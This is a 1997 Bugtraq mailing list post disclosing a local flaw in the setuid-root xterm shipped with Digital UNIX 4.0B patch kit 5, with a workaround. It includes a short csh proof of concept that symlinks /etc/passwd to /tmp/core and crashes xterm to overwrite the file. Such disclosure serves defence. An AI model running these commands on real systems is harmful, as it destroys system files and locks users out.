Bugtraq mailing list archives
Digital Unix Security Problem
From: tom () sba miami edu (Tom Leffingwell)
Date: Wed, 12 Nov 1997 14:51:40 -0500
I tried reporting this to DEC, but because I didn't have a software support agreement number handy, they wouldn't let me report anything, then they placed me on hold for 30 minutes, then they disconnected me. Tip to DEC: Allow people to report security problems without paying for software support. Or at least allow someone other than the designated contact to report security problems. Version Affected: Digital UNIX 4.0B *with* patch kit 5 Unpatched 4.0B is not vunerable to this particular problem, but it is to others. Impact: Local users may overwrite system files, and possibly obtain root. Problem: Patch kit 5 included a replacement xterm because the old one had a bug, too. They replaced it with another that had a bigger problem. You can cause a segmentation fault in xterm simply by setting your DISPLAY variable to a display that you aren't allowed to connect to or one that doesn't exist. Start xterm, and you get a core file. Xterm is installed setuid root. I'm not 100% sure what happens, since DEC doesn't release the source for patches. It does dump core at XtOpenApplication(), however. Even with a buffer overflow, I've never seen anyone exploit on one DU. If anyone has done so sucessfully, plese email me. Despite that, a person with basic knowledge of unix could easily do something like: #/!bin/csh cd /tmp ln -s /etc/passwd /tmp/core setenv DISPLAY abcdefghi /usr/bin/X11/xterm The contents of /etc/passwd becomes xterm's core, preventing further logins. Obviously you could do things without an immediate impact such as ln -s /vmunix /tmp/core. Workaround: Needless to say, change permissions on xterm, have the users run dxterm, its better anyway. ___________________________________________________________________ Tom Leffingwell University of Miami (305) 284-1337 Systems Administrator Support Manager Information Technology School of Business Ungar 138 Jenkins 314M ___________________________________________________________________
Current thread:
- Digital Unix Security Problem Tom Leffingwell (Nov 12)
- Re: Digital Unix Security Problem Andrew Brown (Nov 13)
- Re: Digital Unix Security Problem Tom Leffingwell (Nov 13)
- (LOWNOISE) Another Digital Unix Security Problem0 Efrain Torres Mejia (Nov 18)
- Re: Digital Unix Security Problem Andrew Brown (Nov 13)